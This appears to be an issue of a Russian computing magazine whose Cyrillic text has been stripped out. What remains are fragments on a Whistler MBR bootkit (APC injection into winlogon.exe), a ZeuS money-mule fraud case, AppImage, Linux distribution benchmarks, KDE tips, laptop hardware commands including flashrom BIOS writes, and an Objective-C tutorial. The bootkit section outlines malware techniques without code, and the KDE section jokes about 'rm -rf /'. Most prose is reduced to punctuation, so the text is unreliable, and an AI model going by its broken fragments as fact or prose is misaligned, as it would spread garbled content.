0, 0x80. 0x80,
, 0x200
. (
) ( 3). ,
.
Windows
? , ( 7)

. ,
.
. (.
MBR). ,
: MBR ,
0x80, , .

int 13

0x0C

2.

NTFS

0x0B

FAT32

0x17

NTFS

3. .
, (real-address mode).
(protected mode), (Linux, Windows, FreeBSD ..).
, ,
, GDTR, LDTR, CR3 .

BIOS.
-,
. :
mov eax, [1000:FFFF];
4 0x1000 << 4 = 0x10000;
0x10000 + 0xFFFF = 0x1FFFF;

Whistler

, ,
. , MBR ,
\\.\PhysicalDriveX CreateFile.
,
. MBR, Whistler,
,
PE. , . . exe,
. ,


Whistler

RedPill Trojan-Clicker.
Win32.Whistler.a

MBR Bochs Enhanced Debugger


for Windows
, . MBR.
Bochs
for Windows .
. .
MBR
BIOS. ,
, BIOS ,
.
, c , , .
-
int 13h, MBR
. int 13h
NTLDR . : 0xB8
REPNE SCASB,
CMP. , NTLDR , BlLoadBootDrivers
. .

. , IoInitSystem.
,
IoInitSystem, . Whistler ,
, .


Trojan-Clicker.Win32.Whistler.a
.
,
.
MBR , .
Stoned Bootkit FrameWork, European Union Public License.
, , .
\\.\physicaldrive0,
PE
APC. APC Asynchronous Procedure Call ,
.
Windows , APC , , ,
.
winlogon.exe, KeStackAttachProcess
. KeInitializeApc
APC-,
KeInsertQueueApc,
. , : \\??\C:\
System Volume Information\Microsoft\.

Whistler,
, ,
. , , .
, Microsoft Visual Studio.
.
, ,
banner3.php .

. , ,
Windows,
, Windows 7, . Windows XP . ,
Bochs
VMWare PETools , , Hiew
. IDA Hex-Rays
PE'. ,
, , Hiew
\\.\physicaldriveX. z


Mifrill (mifrill@real.xakep.ru)

, ,
,
. , ,
.
,
.

Trident Breach

-

Trident Breach (:
), ,
,
ZeuS-.
ZeuS
;
.
, ZeuS, Zbot, PRG, Wsnpoem, Gorhax
Kneber
.

, ,


IT-
.
.

, ,
.
.
,
, ,
2009 .
46
, ,

ZeuS-.
,
. -


,
( ,
), ,

, .
,
- ,

.
. ,
,
, .


,
, , ,
.

:
e-mail- (
ZeuS).

,
, , , .
, ,

. ,

$220 ., , ( ) $70
. , :
,

.
, ?
. ,

,
( money
mule ) ,

( ) ,
.

,
Trident Breach, 20 25 ,
, ,
.
( )
,
-. ,
.
, . ,
, ... ,
, , ,
J-1,
Work&Travel. , :
W&T -
, ,
.
, .

,

.
? ,
.
, ,



. ,
,

.



;
$3000.

,
- .

1. ,

2.

3. -

4. -

5.

6.

8.

7.


-
,


: 390
: $220
: $70

: 92 39
: 20 8
: 5 8


? ,
ZeuS
(
,
). ,
5-20% .
. , ,
,
.
:
,
PIN-.

.
.

. Trident Breach


.
( )
,
Jack Daniels. Jack Daniels,
26- ,
:
,
.

, ,
.

-,


. , Jack Daniels
,

$9983.
Jack Daniels
,
.
.

, Jack Daniels

. , ,
: 10
$38 314 . ,
20
$500 000. , ,
,
:).
,

. ,
.
39 ,
92 !
-,
,

. , ,

,
TD Bank,
Chase Bank, Bank of America Wachovia,
,

. , :
, , -,
.

-


, ,

.
: 10 30 $250 000 $1
. . , ,
,
.
, , , 20
(
)
.

, . , ,
, ,
, . , ,
ZBot
(,
, ).

, ,
,

ZeuS,
.
, , .
,
, ,
. , , Trident Breach ,


, ,
.
,
, $70 .
,
,
. z

UNIXOID


zobni n@gmail.com
Elementary Project
Linux-
AppImage,

. , ,
Linux,
.

Elementary Project (
, ,
Ubuntu, www.elementary-project.com)
, Windows
(Portable Apps),
: (,
, ),
(
)
(
). :
.
( )
.


, Dropbox,
,
.
.
, .
?
.

AppImage- Portable Linux Apps


(www.portablelinuxapps.org),
.

(Kubuntu
10.04 x64). Opera 10.70

15 ,

( ,
AppImage-

.appimage, ).
file
ELF 32-bit LSB executable, Intel 80386
.
(chmod +x Opera\ 10.70), , libfuse.so.2 .


.
, , .
ldd, -,

libc libfuse libglib-2.0.
fuse,

AppImage

. ,

.
.opera,
,
( ,

Dropbox).
, AppImage ,
(64- ),
.
.

AppImageAssistant
AppImage

( , ),
? ,
GTK ( Gnome),
, mc. ,
.
Kubuntu libglib-2.0 ,
libfuse. sudo apt-get install libfuse2 libfuse2. ,
(, NTFS-3g,
Ubuntu), ?
: 64- libfuse
32- ,
Opera 10.70. : 32-
.
, 32- Ubuntu 10.04 .
Opera 10.70, ,

, , Deb RPM. AppImage


,
, ISO-, ,
.
AppImage
ISO-. ,
mount
. ( , )
( ),
( fuse)
AppRun,
. AppImage- ,
.
ISO-,
, :
$ mkdir /tmp/appimage
$ sudo mount -o loop Opera\ 10.70 /tmp/appimage
$ cd /tmp/appimage && ls


AppImage RISC OS


mount , AppImage

? -, AppRun,
ISO-.
.

APPRUN
HERE="$(dirname "$(readlink -f "${0}")")"
export OPERA_DIR="${HERE}/share/opera"
exec "${HERE}/lib/opera/opera" "$@"


OPERA_DIR
/_/share/opera
/_/lib/opera. , OPERA_DIR
, /usr/share/opera. ,
AppRun
, (,
), .
AppImage opera-browser.desktop, , , (
opera-browser.png), , ,
, ..
( freedesktop). .DirIcon.
.
LICENSE, install, opera-widget-manager
share lib,
/usr/share /usr/lib.
, , man-, . Opera ( ,
Xlib X Window),
lib ,
Gstreamer. ,
, ,
.

AppImage

AppImage- ,
.
:
(, ,
-)
AppRun
.desktop,
: , AppRun .desktop- (


1988 Acorn Computers RISC OS 2.00,


. ,
AppDir:
, . ,
!Run, .
NEXTSTEP, ,
ROX-Filer (
RISC OS on X).
ROX ,
!Run AppRun, !Sprites .DirIcon,

.appdir. AppImage
.desktop-.

)
deb-
. , - ,
. ,
Elementary Project (www.elementary-project.com/wiki/index.php?title=Creating_AppImages).

:
$ ar xv .deb

: control.tar.gz, data.tar.gz debian-binary.


, .
. :
$ tar xzf data.tar.gz

,
.appdir:
$ mv data .appdir

_.desktop .appdir/
usr/share/applications .appdir.
AppRun, Elementary Project:
$ cd .appdir
$ wget www.elementary-project.com/downloads/AppRun
$ chmod +x AppRun

AppRun, . , ,
AppDir (Application Directory) ,
. ISO .
AppImageAssistant (www.elementary-project.com/downloads/apps/AppImageAssistant).
, Forward, .
appdir Forward. , AppImage .
(,
Elementary Project). .
, .desktop-, AppDir, .
Opera,

Ryan C. Gordon FatELF,
. ,
ARM x86.
FatELF
- ,
.

,
,
, ,
. AppRun,
Elementary Project,
. ,
.desktop-
,
AppDir (, .appdir/usr/lib .
appdir/usr/bin) . ,
- /usr/share,
AppImage ,
. ,
Opera
OPERA_DIR,
.

, -
, .
DOS, - ,
Portable. ,
NEXTSTEP Mac OS X.
.app ( ,
), .

RISC OS,
ROX ( AppImage RISC OS).
UNIX-
. UNIX
. , ,
portablelinuxapps.org portable-
. UNIX
.
/bin,
/lib. ,
.
UNIX , ,
- ( make install ). , ,
,
,
, 40 ,
, , .
, , ,
,
.
dll hell (
, , , ), /usr (
?),
( apt-get install firefox3 firefox4
) (
). . ,
UNIX ,

, .
Linux
. Zero Install
(zero-install.sourceforge.net),
.
Klick (klik.atekon.de)
. AppImage.

AppImage- ,
, . ,
Linux,
, Linux
Linux' . z


UNIXOID
grinder grinder@tux.in.ua

: Linux Mint 9
vs Calculate Linux Desktop 10.9

Gentoo
, .
gcc
,
. ,
.

Linux?

,
?
,
,
. 21
source-based -


Gentoo Crux. -
,
CPU Celeron 300A.
, FreeBSD,
, ,
Linux.

,

Debian Ubuntu. ,

,
, .

. , , . Gentoo,
, ,
Stage

links
Phoronix Test Suite phoronix-test-suite.com
GCC gcc.gnu.org/onlinedocs
, : en.gentoo-wiki.com/wiki/Safe_Cflags/Intel, en.gentoo-wiki.com/wiki/Safe_Cflags/AMD
CLD calculate-linux.ru/main/ru/optimization_of_system

QGears2
1 Stage 2, , ,
, . 3-5%,
Stage 1 2, Stage 3, .
C , : x86 x64 (
). ,
, .
, x86 , .
, .
, , , : Linux
Mint 9 source-based Calculate Linux Desktop 10.9 beta (CLD).
Ubuntu ,
.
Gentoo, , ,
( CLD Gentoo).
,
PR.
Linux Mint , i386 amd64. CLD 10.9 beta
i686 , .
Linux Mint 9 Isadora
: linuxmint.com
: 18 2010
: GNU GPL

: x86_32, x86_64
: kernel 2.6.32, glibc 2.11.1, GCC
4.4.3, UDEV 151, HAL 0.5.14, X.Org 1.7.6, Compiz 0.8.4,
GNOME 2.30.0, Mesa 7.7.1
Calculate Linux Desktop 10.9 beta
: calculate-linux.ru
: 26 2010
: GNU GPL
: x86_32, x86_64 ( )
: kernel 2.6.34.4, glibc 2.11.2, GCC
4.4.3, UDEV 151, HAL 0.5.14, X.Org 1.7.7, Compiz 0.8.4,
GNOME 2.30.0, Mesa 7.8.2

,
. X.Org. : AMD
Athlon 64 X2 Dual-Core 3600+/2 /Seagate Barracuda ST3160815A/
ATI Radeon X800 GTO.
Phoronix Test
Suite 2.8 Lyngen (phoronix-test-suite.com), 130
. Debian/Ubuntu deb-.
Gentoo ebuild, ,
CLD Generic Pckage.
php cli,
emerge. ,
phoronix-test-suite list-tests,
phoronix-test-suite info <test name> ( Test Type
) , , phoronix-test-suite benchmark <test
name>.

, .
~/.phoronix-test-suite. ,


Ubuntu/Debian
Gentoo ,
, .
, , , Gentoo.
, /etc/apt/sources.list
, deb-src. Linux Mint . apt-get update apt-build:
$ sudo apt-get install apt-build

Phoronix Test Suite GUI


,
, 1,5 , .
phoronix-test-suite make-download-cache.
download-cache.
test-result.
.
, . , 133 ( ,
), 10 (
VERIFIED, FREE). , : build-mplayer, john-the-ripper (Traditional DES), compress-gzip
( 2 ) encode-flac, encode-ogg, mencoder (
AVI to LAVC), openssl. ,
warsow ( 800x600),
FPS (warsow.net), OpenGL-
qgears2. , qgears2 CLD,
:
# emerge qt-opengl


phpbench, PHP-. Phoronix Test
Suite 3-5 . , ,
.

32 vs 64

Linux
: 32- 64- .
,
. 32-

i386, i486, i586 i686, , . ,
P6 (i686, Pentium Pro) 1995
, . ,
i386-i586, , (
,
][ 04.2007 ..) ,
( MMX, SSE, 3DNow ..),
.
32 Linux Mint 9 ( Ubuntu) i386 , - . ,



.
dpkg-reconfigure apt-build.
apt-get aptitude apt-build, . ,
, apt-build update, apt-build install
_. , aptbuild upgrade, apt-build world .
--force-yes .
/usr/
share/doc/apt-build/README.Debian,
. ,
:
$ sudo dpkg --get-selections | awk '{if ($2 == "install") print $1}' | sudo tee /etc/apt/apt-build.list > /dev/null

Ubuntu 32 Recommended for most


users, 64- : Not recommended for daily desktop
usage. ,
64-. :
Linux Mint 9 (32bit)
warsow - 2.57 FPS
build-mplayer - 260.97 sec
john-the-ripper - 950160333 Real C/S
compress-gzip - 54.61 sec
encode-flac - 25.70 sec
encode-ogg - 36.87 sec
mencoder (AVI to LAVC) - 54.27
openssl - 11.90 Signs PS
phpbench - 19573.00 Score
QGears2:
CPU-based Raster - Test: Gears - 24.49 FPS
XRender Extension - Test: Gears - 42.32 FPS
OpenGL - Test: Gears - 67.68 FPS
Linux Mint 9 (64bit)
warsow - 2.60 FPS
build-mplayer - 194 sec
john-the-ripper - 928921000 Real C/S
compress-gzip - 55.17 sec
encode-flac - 14.57 sec
encode-ogg - 25.39 sec
mencoder (AVI to LAVC) - 53.24 sec
openssl - 37.75 Signs PS
phpbench - 28621 Score
QGears2:
CPU-based Raster - Test: Gears - 25.64 FPS
XRender Extension - Test: Gears - 48.72 FPS
OpenGL - Test: Gears - 87.56 FPS

John the Ripper 32- , 2%

PHPBench 64- Linux


Mint

64-
32- .
2-8%.
PHPBench 46%. ,
64- 32 John
the Ripper. , JTR , 64 . , CLD, i686-
.

CLD

Calculate Linux Desktop 10.9 beta ( )


warsow - 2.60 FPS
build-mplayer - 68.85 sec
john-the-ripper - 949247333 Real C/S
compress-gzip - 55.83 sec
encode-flac - 15.87 sec
encode-ogg - 32.80 sec
mencoder (AVI to LAVC) - 53.10 sec
openssl - 11.8 SPS
phpbench - 24907 Score
QGears2:
CPU-based Raster - Test: Gears - 25.30 FPS
XRender Extension - Test: Gears - 53.86 FPS
OpenGL - Test: Gears - 135.79 FPS

. ,
MPlayer 32- CLD 64- Linux
Mint 3 . WAV- FLAC CLD
64- Linux Mint, OGG
64- .

.
OpenSSL, , 32- 64-. PHPBench 32-
CLD 64- 25%,
32- Linux Mint.
FPS Warsow , , , Mesa. OpenGL QGears2 CLD
, , Mesa.
, ,
Gentoo ,
. , ,
64- CLD ,
Linux Mint x64. ,
.

, source-based
,

.
( -march -mtune ;
native,
/proc/cpuinfo), , , ,
.
, ,
, , /,
. , -
,
, . GCC : -O0
( ) -O3 ( ) -Os
( ).
, ,
. -O2, -O3 .
, ,
(, -fomit-frame-pointer, -ffast-math, -funroll-loops). ,
CFLAGS, :
$ gcc -Q --help=optimizers | grep enabled

man
gcc GCC (gcc.gnu.org/onlinedocs/).
Gentoo , Portage,
/etc/make.conf. .
CHOST , CFLAGS
. MAKEOPTS , ,
(
). LINGUAS. CLD make.conf
, ( calculate-linux.ru/
main/ru/optimization_of_system).
:
# cat /etc/make.conf
/usr/share/calculate/templates/install/merge/portage/make.conf
LINGUAS="en ru"
ACCEPT_LICENSE="*"
source /var/lib/layman/make.conf
CFLAGS="-march=native -O2 -pipe -fomit-frame-pointer"
CXXFLAGS="${CFLAGS}"
MAKEOPTS="-j3"
EMERGE_DEFAULT_OPTS="--jobs=4"

:
# emerge -e system
# emerge -e world

mencoder, QGears2), - (encodeflac, phpbench). , , ,


. ,
, .

,
, .
64- .
. ,
.z

.
Calculate Linux Desktop 10.9 beta ( )
warsow - 2.60 FPS
build-mplayer - 68.14 sec
john-the-ripper - 949691333 Real C/S
compress-gzip - 52.10 sec
encode-flac - 15.92 sec
encode-ogg - 32.44 sec
mencoder (AVI to LAVC) - 50.59 sec
openssl - 11.8 SPS
phpbench - 24511 Score
QGears2:
CPU-based Raster - Test: Gears - 25.35 FPS
XRender Extension - Test: Gears - 53.78 FPS
OpenGL - Test: Gears - 142.39 FPS

, . -
(build-mplayer, john-the-ripper, compress-gzip, encode-ogg,


QGears2 CLD 64- Linux Mint



UNIXOID
Adept adeptg@gmail.com


DE
KDE 4.0 ,

KDE 3.5.
, ,
Qt KDE4
DE .
KDE, .
Plasma widgets

KDE4
KDE3 Plasma,
, KDesktop, Kicker
SuperKaramba. .

.
SuperKaramba, Google
Gadgets, Mac OS X Dashboard,
. ,
:


folder view (
) ,
.
; , , /tmp.

Flash (*.flv).
, YouTube :).
pastebin ,

( pastebin.

ca pastebin.com)
( imagebin.ca, imageshack.us, simplestimage-hosting.net imgur.com). ,
Dolphin , ,
KSnapshot
Pastebin. ,
.
paste ( )
,
.

INFO

info

<Alt+Tab>

kubuntu

: sudo apt-get install plasma-widget-*.

krunner

.
tail ( ) ,
.
.
.
google translator ,
translate.
google.com.
plasmacon (konsole)
. .
easy SSH connection
SSH-.
web slice ( Web) ,
- .
RSS ( ,
).
microblogging .
lancelot kickoff. krunner
. .
,
.
, , Amarok ( ).
,
zeroconf (, avahi-daemon). : Share
( ) Share this widget on the network
( ).
, ,
,
. , dolphin network:/.
,

. , - .
.

Plasma activites

, , Plasma
Activites. , ,
,
. ?

Live-
KDE
:
http://home.kde.org/~kdelive/

.
, .
vim/emacs/eclipse ( ) . .

, , IM-
(
),
.. , , .
. . .
, -
.
, ,
:). .
. , ?
KDE . -
, - 4.8. :
/ , (
Super-Q).
,
( gnome_killer- :) ).
: System Settings (
) Window Behavior ( )
Virtual Desktops ( ) Different widgets
for each desktop ( ).
,

. ;
- : .

Plasma netbook

Plasma ,

/.
. : System Settings (
) Workspace ( Plasma)
Workspace type ( )
Netbook ().

Search and Launch.
( -

Zeroconf (Zero Configuration Networking) ,


IP-.
Avahi
zeroconf.

HTTP://WWW
links
kde.org

planetkde.org

KDE
userbase.kde.org KDE (wiki)
www.kdedevelopers.org KDE
windows.kde.org KDE Windows

WARNING
warning
KDE
4.5,



.


klipper

krunner) .
, .
, taskbar'
( ) ( )
.

, /
, , ,
. . <Alt+Tab>, taskbar'.
Search and Launch,

, (
page one). page one ,
. , Plasma
, Add page ( ).
Plasma Netbook ,
.

kwin

KDE.
, compiz, () Intel',
, WM.
-, kwin . ,

. System
Settings ( ) Desktop Effects ( ).
kwin
, ,
.
.
Move Window to Group (
). -
, konsole dolphin.
kwin
. , ,
rekonq
. :
Advanced ()
Special Application Settings ( ).
edge snapping. : () , ().
, .
KDE 4.5, kwin (tiling)
. , ,


KDE4 , (,
) Windows Mac OS X.
, KDE WinXP,
. , .
KDE SC
4.5.1, Win 4.4.4. WinXP .
windows.kde.org ( ;
).
: ---.
:
, . winkde.org , nightly.
, .
, KDE Win .

.
. :
xmonad, ion3, ratpoison , .
, , . , : System Settings ( ) Window Behavior ( ) Advanced
() Enable tiling ( ).
:
(Spiral) ( )
.

.
(Columns) : ,
.
(Floating) ,
.
Spiral. ,
( )
. :
Float
Window ( ).

.
, /.
, WM,
(: ). ,
,
. , .

krunner

,
krunner. ,
<Alt+F2>. , , krunner (
Nepomuk). ,
<Tab>/<Tab+Shift>
/. , .
Krunner ,
, , 16*1024=.

Plasma Netbook

Tailing

KDE


. (sin, cos ..), (sqrt) . , krunner
, ,
, rm -rf / :). krunner , , 21,5 , . , , , , ,
. xakep.ru,
. , :
ggk: some_word some_word
wp: some_word some_word

krunner Konqueror' rekonq (


).
: krunner (,
) , kopete amarok
, . ,
.

Klipper

KDE .
klipper, .
, .
. ,
clck.ru,
(^(http|https|ftp):\/\/[a-z0-9]+([\-\.]{1}[a-z0-9]+)*\.[a-z]{2,5}(([0-9]{1,5})?\/.*)?$),
lwp-request http://clck.ru/--?url=%s.
.
Shortcuts ( ) ,
Manually Invoke Action on Current Clipboard (
) ( <CtrlAlt-R>). ,
, .

KDE . .
, ,
. Dolphin timeline,
. ,
Strigi : Desktop Search ( ) Enable Strigi Desktop File Indexer
( Strigi). File Indexing
( ) ,
, . Strigi
( ODT, PDF, MP3) , ,
,
,
.
Dolphin (Settings ()
Toolbar Shown ( ) Search Toolbar
( )) Nepomuk.
nepomuksearch:/KDE.
.

KDE4 DE .
Gnome

Gnome3. ,
KDE, . ,
. z

089

UNIXOID
zobni n@gmail.com

Linux
- ,
200 , HAL udev
.
UNIX ,
.
Linux
, ,
,
.
, UNIX-
,
Windows
. ,
,

. Linux
. , ,

? ,
,
.

090

7.3 X.Org ,

.
, .



. ,

,
( ,
).
(
,
- ).


,
,
<Fn>, ,

ddccontrol

INFO

info




lshw.
nvramwakeup




BIOS.

flashrom , BIOS

. ,
UNIX . -
, ,
.
, (
) ,
Synaptics. X.Org , ,
. synclient
, syndaemon -
. , Linux-
,
(,
ASUS /etc/acpi/events/asus-touchpad, /etc/acpi/asus-touchpad.sh).
, .
, (

, ,
).
, synaptics
, xorg.conf.
. X- (
1.8) , ,
/usr/lib/X11/xorg.conf.d.
( ,
, , xorg.conf
-). 10-synaptics.conf
InputClass,
,
Option "SHMConfig" "true" (
), . :
# Two-finger vertical and horizontal scrolling
Option "VertTwoFingerScroll" "1"
Option "HorizTwoFingerScroll" "1"
# Pointer acceleration
Option "AccelFactor" "0.010"
# Circular scrolling
Option "CircularScrolling" "on"
Option "CircScrollTrigger" "0"

BIOS
modprobe nvram && dd if=/dev/nvram of=nvram.bin.

,
. -, synaptics ,

, ,

- .
(
).
-, KDE/Gnome, gsynaptics
synclient ( X.Org , , ,
). X.Org,
. ASUS (
) . :
$ synclient TouchpadOff=1

. . ,
( ~/.xinitrc DE):
$ syndaemon -K -d -i 1

'-K' syndaemon
,

091

UNIXOID



xrandr
Intel
* LVDS:
* TMDS-1: DVI
* VGA: VGA
* TV: TV-
ATI
* LVDS:
* DVI-0: DVI
* DVI-1: DVI
* VGA-0: VGA
* VGA-1: VGA
Nvidia ( )
* LVDS:
* DVI0: DVI
* DVI1: DVI
* VGA0: VGA
* VGA1: VGA

xrandr KDE

, '-d' ,
'-i' . '-t',
, .
, , , , :
ACTION=="add", SUBSYSTEM=="input", ENV{ID_CLASS}=="mouse", RUN+="/usr/bin/synclient TouchpadOff=1"
ACTION=="remove", SUBSYSTEM=="input", ENV{ID_CLASS}=="mouse", RUN+="/usr/bin/synclient TouchpadOff=0"

/etc/udev/rules.d/01touchpad.rules. .


- .
( ) . ,
, , VGA- HDMI. ,
, , ,
.
,
(,
KDE ).
KDE,
.

X-.
: Xinerama, DEC ( PanoramiX),
RandR, ,
Xinerama.
,

X.Org ( , ,
Xinerama
,
).
Xinerama, RandR
( !),
OpenGL AIGLX ( Compiz'
FlightGear!) . ,
dual head xrandr
( ):

092

1. xrandr -q (
xrandr ). VGA- VGA-1 , VGA-0
, disconnected, .
2. , xrandr -q
connected VGA-0.
DDC ( ),
.
3. :
$ xrandr --output VGA-0 --auto

$ xrandr --output VGA-0 --mode 1024x768 --auto

.

(
).
( , ),
.
, , .
4. :
$ xrandr --output VGA-0 --right-of LVDS

,
( 1024x768 2048x768).
,
(LVDS ) .
'--right-of', ,
. xrandr '--left-of' (), '--above' () '--below' ().
, , '--pos'. :
$ xrandr --output VGA-0 --pos 1024x0

xrandr -q


SATA-
2.6, Linux
SCSI-, SATA. ,
,
. ,
,
( sda
: sda1 sda2)
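# Flush filesystem buffers to disk
sync; sync
# Unmount every partition of the disk
umount /dev/sda1
umount /dev/sda2
# Detach the disk from the SCSI subsystem
echo 1 >/sys/block/sda/device/delete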

SATA-
:
# for h in /sys/class/scsi_host/host*; do echo "- - -" > "$h/scan"; done

, ,
. ,
nVidia . nVidia (Intel, nVidia, AMD/
ATi), RandR
1.2, ,
.
TwinView,
nvidia-settings ( ,
, ).

DDC (Display Data Channel)


,
, .


, , .
DDC
,
.
, ,

. , ,
,

, ,

.
DDC , I2C (InterIntegrated Circuit).
VGA-, .
DDC
,
(
, ), , ,
, ,
256 ( ,
). DDC
, ,
( ).
, DDC
. ,
. -, ddccontrol,
, ,
. -, ddccontrol,
, ( ),
. -,
( 256 ) ,
.
, . ddccontrol:
$ sudo apt-get install ddccontrol

'-p', :
$ sudo ddccontrol -p

, . ,
I2C :
$ sudo modprobe i2c-dev
$ sudo su
# echo i2c-dev >> /etc/modules

. ! . ,
,
, . ddccontrol -

093

UNIXOID

lshw
,
VESA.
, (
0x10 0x12, 50 127).
:
$ sudo ddccontrol dev:/dev/i2c-1 -r 0x10


Linux, -, Linux

flashrom.
flashrom
OpenBIOS,
. flashrom

,
BIOS, .
, http://flashrom.org,
Linux-
BSD-.
,
. flashrom ,
, 100%
EEPROM,
BIOS ( ).
,
'--force'
.
, EEPROM:

$ sudo ddccontrol dev:/dev/i2c-1 -r 0x10 -w 50


$ sudo flashrom

dev:/dev/i2c-1 I2C- ddccontrol -p, 0x10 , 50 .


, ,
cron (,
).
VESA. , 0xe1
:
$ sudo ddccontrol dev:/dev/i2c-1 -r 0xe1 -w 0
$ sudo ddccontrol dev:/dev/i2c-1 -r 0xe1 -w 1

(
, BIOS
), No
EEPROM/flash device found, ,
.

( ,
):
$ sudo flashrom -r old_bios.bin

:
alias :
$ sudo flashrom -w new_bios.bin
$ sudo su
# echo "alias haltmon='ddccontrol dev:/dev/i2c-1 \
-r 0xe1 -w 0'" >> ~/.bashrc

, :
$ sudo su
# mplayer .avi; haltmon

Samsung'
,
.
(, Game ).
ddccontrol
( 0xdc
).

BIOS

, BIOS
, DOS. , . ,

094


( ):
$ sudo flashrom -v new_bios.bin

EEPROM- ,
'-c',
( ).
. BIOS Linux , . , ,
SSH- (
Puppet, ).

UNIX- .
, , LFS .
, , ,
. z

CODING
seva@vingrad.ru

- !
Mac OS
Objective-C

,
C/C++ Java, Objective-C
.
API Cocoa. Objective-C Cocoa .
C ...
C

Objective-C , 1986 , Brad Cox Tom Love Stepstone.


, - , .
C,
Smalltalk, .
-
Objective-C C. ,

Apple, ...
Apple 1980 .

Coca-Cola (John
Sculley). Apple
, NeXT. NeXT
.

Objective-C API. NeXT

096

NeXTStep. ,
ObjC. NeXT
Sun Microsystems NeXTStep
OPENStep (
GNUStep, ). 1990-
Apple, .

Mac OS.
Apple ,
. , ,
NeXT. Apple, NeXTStep
Mac OS X, Objective-C Mac- API Mac OS X.

, Objective-C -
. , , , ?
Objective-C :
Objective-C . ,
- .

XCode 4 - Interface Builder

Cocoa
,
. ,

Objective-C ( ++, -, ).
Objective-C message-oriented language,
, C++ Java,
. -
, ,
,
,
, ,
. , ,
.

, . Objective-C
; ,

, ( ) instance-, ,

( ,
,
C++ Java) ..

, !

- : .
!.
,
! HelloWorld Obj-C. ,
Mac OS X ,
Objective-C Cocoa c
GCC OpenStep.

ObjC
#import <Cocoa/Cocoa.h>
int main(void)
{
    NSLog(@"Hello world!");
    return 0;
}

HTTP://WWW
links

HelloWorld C++, ?
, , ,
.
#import ,
#include, , ,
,
, C++ (#include, , ).
Cocoa.h , ,
Cocoa, .
NSLog . stdout timestamp
. NeXTStep? NS
:).
Objective-C . NSLog C-, NSString.
NSLog?
ObjC NSString
Cocoa zero-terminated ,
C, NSString
(NSMutableString ). Cocoa , NSString
,
. , , ,
.
XCode .
XCode , Mac OS iOS.
, , ,
.
Interface Builder,
SCM .
Apple
GCC. GDB.

developer.apple.com
,
Mac OS
www.cimgf.com
Cocoa
Objective-C
www.gnustep.org
GNUStep
www.cocotron.org

ObjC, XCode
Cocoa Windows

DVD
dvd

XCode

097

CODING

XML-
// Cocoa framework
#import <Cocoa/Cocoa.h>

// Class interface
@interface RCBDayly : NSObject
{
@private
    // NSMutableDictionary is the counterpart of map in C++
    NSMutableDictionary * Valutes;
}
// Initialize the object from the URL of the exchange-rate XML
-(RCBDayly *) initWithContentsOfURL:(NSURL*)url;
// Return the rate stored for a currency code
-(NSString *) getValueForCharCode:(NSString *) char_code;
@end

// Class implementation
@implementation RCBDayly
-(RCBDayly*) initWithContentsOfURL:(NSURL*) url
{
    // Initialize the NSObject part first
    self = [super init];
    if (self == nil)
        return nil;
    // Load the XML document from the URL
    NSError * err = nil;
    NSXMLDocument * cbr_xml =
        [[NSXMLDocument alloc] initWithContentsOfURL:url
                                             options:0 error:&err];
    if (cbr_xml == nil || (err != nil && [err code] != 0))
    {
        // Loading failed: no network, or the XML is malformed.
        // localizedDescription of NSError gives the reason.
        NSLog(@"Error:%@", [err localizedDescription]);
        // Free everything allocated so far
        [cbr_xml release];
        [self release];
        return nil;
    }
    // Create the NSMutableDictionary
    Valutes = [[NSMutableDictionary alloc] init];

    // Array of XML nodes
    NSArray * nodes = nil;
    // All Valute elements under the XML root
    nodes = [[cbr_xml rootElement]
                elementsForName: @"Valute"];

    // Take CharCode and Value from every Valute element
    for (NSUInteger i = 0; i < [nodes count]; ++i)
    {
        NSXMLElement * valute =
            (NSXMLElement *)[nodes objectAtIndex: i];

        NSArray * names = nil;
        names = [valute elementsForName: @"CharCode"];

        NSArray * values = nil;
        values = [valute elementsForName: @"Value"];
        // Were both elements found?
        if ([names count] > 0 && [values count] > 0)
        {
            // Store the CharCode -> Value pair
            // in the NSMutableDictionary
            [Valutes setObject:
                [(NSXMLElement *)
                    [values objectAtIndex: 0] stringValue]
                forKey:[(NSXMLElement *)
                    [names objectAtIndex: 0] stringValue]];
        }
    }
    // The parsed document is no longer needed
    [cbr_xml release];
    return self;
}

// Release the dictionary together with the object
-(void) dealloc
{
    [Valutes release];
    [super dealloc];
}

// Accessor for the private Valutes dictionary
-(NSString*) getValueForCharCode:
    (NSString*) char_code
{
    return [Valutes objectForKey: char_code];
}
@end

int main(int argc, char *argv[])
{
    // The pool owns autoreleased objects,
    // such as the one returned by [NSURL URLWithString]
    NSAutoreleasePool * pool =
        [[NSAutoreleasePool alloc] init];
    // Create an RCBDayly object from the URL
    RCBDayly * dayly_values =
        [[RCBDayly alloc] initWithContentsOfURL:
            [NSURL URLWithString:
                @"http://www.cbr.ru/scripts/XML_daily.asp"]];

    if (dayly_values == nil)
    {
        // Initialization failed
        [pool release];
        return -1;
    }

    // Print the USD rate. The value goes in as an argument:
    // downloaded data must never be used as the format string.
    NSLog(@"%@", [dayly_values getValueForCharCode:@"USD"]);
    [dayly_values release];
    [pool release]; // frees the autoreleased objects
    return 0;
}

Apple XCode 3,
XCode 4 Apple. , , , ...

-, , . , Objective-C.

098

Objective-C , .
h, m.
, -,
, , ,
, , .
ObjC .

// Dog inherits from NSObject
// Dog.h
@interface Dog : NSObject
{
    // Instance variables
@private
    int Age;
@public
    int Color;
}
// Method declarations. A leading "-" marks an instance method;
// a class method (static in C++) is marked with "+".
- (void) voice;
- (void) setAge: (int) age;
- (int) getAge;
@end
// Implementation (Dog.m)
@implementation Dog
- (void) voice
{
    NSLog(@"Woof woof");
}
// Accessors for the private Age variable
- (void) setAge: (int) age
{
    Age = age;
}
- (int) getAge
{
    return Age;
}
@end

Cocoa

[my_class_pointer message_name: arg1 arg2_name: arg2 arg3_name: arg3]

:
[dog1 setAge: 3];

C++ Java,
. ,
(nil). nil.
,
- ,
.
, , . Objective-C
. ,
.
Dog, :
Dog * dog1 = [[Dog alloc] init];
alloc NSObject.
.
,
init.
alloc init, NSObject.
init , - . init ObjC.

Cocoa Framework
Cocoa Objective-, Mac OS X .
Cocoa ObjC,
Objective-C. Cocoa Linux
Windows GNUStep cocotron.

Carbon Framework
Carbon Mac OS X, C/C++.
Mac OS (, Mac OS 9).
Carbon
Mac OS X . , , GUI Carbon 64- Apple
Cocoa.

099

CODING

, ,
:
int age = [dog1 getAge];
[dog1 voice];

,
() , release:
[dog1 release];

ObjC .
alloc , .
release 1.
, 0. COM, .
, retain. , Objective-C 2.0, ,
. ,
(NSAutoreleasePool), autorelease. , , Cocoa
( stringByAppendingString NSString, ).
NSAutoreleasePool *pool;
pool = [[NSAutoreleasePool alloc] init];
NSString *str;
//
// pool
str = [[[NSString alloc] init] autorelease];
// ...
[pool drain]; // str

ObjC , ,
Objective-C.
.
C
(errno ).
,
.

, . , ObjC, C++,
.
ObjC:
